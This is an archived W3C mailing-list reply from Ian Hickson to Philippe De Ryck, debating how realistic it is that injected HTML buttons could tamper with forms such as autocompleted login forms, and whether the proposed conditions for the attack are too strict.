W3C home > Mailing lists > Public > public-html-comments@w3.org > August 2011

Re: [html5] Input attributes allow form tampering

From: Ian Hickson <ian@hixie.ch>
Date: Thu, 4 Aug 2011 16:18:29 +0000 (UTC)
To: Philippe De Ryck <philippe.deryck@cs.kuleuven.be>
cc: public-html-comments@w3.org, Giles Hogben <Giles.Hogben@enisa.europa.eu>, Lieven Desmet <Lieven.Desmet@cs.kuleuven.be>
Message-ID: <Pine.LNX.4.64.1108041608500.14637@ps20323.dreamhostps.com>
On Thu, 4 Aug 2011, Philippe De Ryck wrote:
> > 
> > I always hesitate to minimise the risk in security risk assessments, 
> > but this does seem somewhat convoluted. Are you aware of any page that 
> > has such a form, accepts user input, and uses a blacklist rather than 
> > whitelist, and allows <button> or <input> to be inserted unescaped but 
> > not <script>?
> 
> Your requirements for a successful attack are rather strict, since the 
> absence of a script injection attack does not seem necessary. A site 
> vulnerable to injection attacks can still be protected against XSS by 
> additional countermeasures (e.g. NoScript), yet remain vulnerable to 
> this issue

NoScript is a client-side counter-measure used by a minority of users. If 
a site is relying on NoScript to not be vulnerable, then that site has 
lost already.

Thus I do not think that the described conditions are unduly strict.


> If you leave these requirements out, you only need a page with a form 
> and displayed user content, which is vulnerable to an HTML/script 
> injection attack. Concrete example sites are any site with 
> user-generated content (blogs, newspapers with comments, wiki's) and a 
> login form (which is often autocompleted by the browser). Tempting the 
> user to click an injected button with "Some really tempting name or 
> image" should be fairly easy.

Once you have a page where this is possible, sure. I'm just not convinced 
that there are pages that allow form controls but aren't already 
vulnerable to some other equal or worse problem.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
Received on Thursday, 4 August 2011 16:19:00 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Thursday, 4 August 2011 16:19:00 GMT